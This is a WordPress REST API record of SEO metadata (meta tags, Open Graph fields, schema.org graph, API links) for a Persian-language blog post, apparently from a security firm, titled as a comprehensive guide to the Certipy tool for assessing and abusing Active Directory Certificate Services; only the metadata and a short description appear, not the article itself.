\u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\" \/>\n<meta property=\"og:description\" content=\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-15T06:00:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"682\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"author\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"41 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"},\"author\":{\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"headline\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\",\"datePublished\":\"2025-07-15T06:00:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"},\"wordCount\":806,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"articleSection\":[\"Agility\",\"\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646\",\"\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\",\"name\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"datePublished\":\"2025-07-15T06:00:42+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"description\":\"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#breadcrumb\"},\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fa-IR\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#primaryimage\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"contentUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/07\\\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp\",\"width\":1024,\"height\":682,\"caption\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/a-detailed-guide-on-certipy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u062e\u0627\u0646\u0647\",\"item\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/\",\"name\":\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\",\"description\":\"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fa-IR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\",\"name\":\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\",\"sameAs\":[\"https:\\\/\\\/liangroup.net\"],\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/author\\\/s-teymouri\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","og_locale":"fa_IR","og_type":"article","og_title":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy","og_description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","og_url":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","og_site_name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","article_published_time":"2025-07-15T06:00:42+00:00","og_image":[{"width":1024,"height":682,"url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","type":"image\/webp"}],"author":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","twitter_card":"summary_large_image","twitter_creator":"@liansecurity","twitter_site":"@liansecurity","twitter_misc":{"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646":"41 \u062f\u0642\u06cc\u0642\u0647"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#article","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"},"author":{"name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"headline":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy","datePublished":"2025-07-15T06:00:42+00:00","mainEntityOfPage":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"},"wordCount":806,"commentCount":0,"image":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","articleSection":["Agility","\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646","\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f"],"inLanguage":"fa-IR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","url":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/","name":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","isPartOf":{"@id":"https:\/\/liangroup.net\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"image":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage"},"thumbnailUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","datePublished":"2025-07-15T06:00:42+00:00","author":{"@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a"},"description":"\u062f\u0631 \u0627\u06cc\u0646 \u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Active Directory \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Certipy\u060c \u0628\u0631\u0631\u0633\u06cc \u062e\u0648\u0627\u0647\u06cc\u0645 \u06a9\u0631\u062f \u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u0627\u0632 Certipy\u2014\u06cc\u06a9 \u0627\u0628\u0632\u0627\u0631 \u0645\u062c\u0645\u0648\u0639\u0647\u200c\u0627\u06cc \u062a\u0647\u0627\u062c\u0645\u06cc \u0648 \u062a\u062f\u0627\u0641\u0639\u06cc \u0637\u0631\u0627\u062d\u06cc \u0634\u062f\u0647 \u0628\u0631\u0627\u06cc \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 Active Directory (AD CS)\u2014\u0628\u0631\u0627\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a \u0648 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc CA \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645.","breadcrumb":{"@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#breadcrumb"},"inLanguage":"fa-IR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/"]}]},{"@type":"ImageObject","inLanguage":"fa-IR","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#primaryimage","url":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","contentUrl":"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/windows_security_safety_protection_encryption_locks_thinkstock_831741980-100749419-orig.webp","width":1024,"height":682,"caption":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"},{"@type":"BreadcrumbList","@id":"https:\/\/liangroup.net\/blog\/a-detailed-guide-on-certipy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u062e\u0627\u0646\u0647","item":"https:\/\/liangroup.net\/blog\/"},{"@type":"ListItem","position":2,"name":"\u0631\u0627\u0647\u0646\u0645\u0627\u06cc \u062c\u0627\u0645\u0639 \u0627\u0628\u0632\u0627\u0631 Certipy"}]},{"@type":"WebSite","@id":"https:\/\/liangroup.net\/blog\/#website","url":"https:\/\/liangroup.net\/blog\/","name":"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646","description":"\u0622\u062e\u0631\u06cc\u0646 \u0627\u062e\u0628\u0627\u0631\u060c\u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u062d\u0648\u0632\u0647 \u0627\u0645\u0646\u06cc\u062a \u0633\u0627\u06cc\u0628\u0631\u06cc","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/liangroup.net\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fa-IR"},{"@type":"Person","@id":"https:\/\/liangroup.net\/blog\/#\/schema\/person\/e328f67a35a843fd3accc4666b5eab0a","name":"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc","sameAs":["https:\/\/liangroup.net"],"url":"https:\/\/liangroup.net\/blog\/author\/s-teymouri\/"}]}},"_links":{"self":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19879","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/comments?post=19879"}],"version-history":[{"count":0,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/posts\/19879\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media\/19915"}],"wp:attachment":[{"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/media?parent=19879"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/categories?post=19879"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/liangroup.net\/blog\/wp-json\/wp\/v2\/tags?post=19879"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}